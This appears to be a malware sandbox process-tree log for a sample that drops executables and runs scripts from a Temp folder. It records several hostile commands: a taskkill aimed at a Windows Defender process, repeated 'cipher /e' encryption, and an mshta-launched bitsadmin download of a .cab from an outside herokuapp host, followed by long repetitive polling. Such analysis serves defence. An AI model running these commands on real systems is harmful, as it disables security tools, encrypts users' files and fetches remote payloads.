C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1288
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WindowsDefender.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K handler.cmd3⤵PID:2352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K cipher.cmd3⤵PID:1460
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵PID:3028
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵PID:3448
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵PID:3652
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵PID:3684
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\Rover.exeRover.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\web.htm3⤵
- Manipulates Digital Signatures
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1940 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1940 CREDAT:275457 /prefetch:24⤵
- Suspicious use of SetWindowsHookEx
PID:1636
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1940 CREDAT:406532 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3240
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1940 CREDAT:275483 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2360
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\Google.exeGoogle.exe3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:2420
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\helper.vbs"3⤵PID:1076
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:292
-
-
C:\Windows\SysWOW64\PING.EXEping mrbeast.codes -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3432
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Google.exe C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:3628
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Rover.exe C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:3660
-
-
C:\Windows\SysWOW64\xcopy.exexcopy spinner.gif C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:3692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K bloatware.cmd3⤵
- Loads dropped DLL
PID:3708 -
C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\bloatware\1.exe1.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3780
-
-
C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\bloatware\3.exe3.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3904 -
C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exeC:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2880
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=GB&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiR0IiLCJjbGllbnRfdmVyc2lvbiI6IjE3OSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyNC0wNy0yOVQxOToyOToxNS43NDdaIiwidG9rZW5zIjpudWxsLCJ2IjoxfQ5⤵PID:3200
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_b0101f2a-a3f0-48c4-bf84-06bd65d62fde\bloatware\2.hta"4⤵
- Blocklisted process makes network request
- Suspicious behavior: GetForegroundWindowSpam
PID:4064 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer dwnl-task-11125 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\dwnl_beetle-cab.cab" | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_start.txt" & echo %errorlevel% > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_exitcode.txt"5⤵PID:2752
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer dwnl-task-11125 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\dwnl_beetle-cab.cab"6⤵
- Download via BitsAdmin
PID:4048
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3420
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵
- System Location Discovery: System Language Discovery
PID:1528
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell Get-MpComputerStatus > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_defenderVersionPowershell.txt"5⤵PID:2768
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-MpComputerStatus6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:888
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2292
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1972
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2912
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3232
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2708
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3856
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:4028
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2216
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1696
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:768
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3732
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2376
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1520
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2760
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3976
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵
- System Location Discovery: System Language Discovery
PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2416
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2860
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1280
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3356
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:772
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2372
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2320
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3256
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1676
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1780
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1908
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2028
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1916
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1552
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2740
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3100
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3668
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3816
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵
- System Location Discovery: System Language Discovery
PID:1972
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3792
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:480
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:912
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2836
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:4032
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3856
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2216
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:992
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2196
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3812
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:768
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2376
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:816
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3648
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:292
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2876
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2176
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2864
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3916
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2468
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:4092
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3804
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2800
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:4084
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1324
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1980
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3876
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:980
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1280
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1804
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2992
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2380
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1672
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1952
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2220
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3436
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2828
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2792
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵
- System Location Discovery: System Language Discovery
PID:1540
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:352
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2296
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3952
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2700
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:4028
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵
- System Location Discovery: System Language Discovery
PID:928 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2976
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:888
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2888
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3060
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3988
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3812
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵
- System Location Discovery: System Language Discovery
PID:4016
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1928
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2804
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1620
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3648
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3884
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2468
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3152
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3348
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:688
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2576
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1960
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3808
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3184
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2272
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3964
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3960
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1356
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3888
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵
- System Location Discovery: System Language Discovery
PID:3684
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1664
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1624
-
-
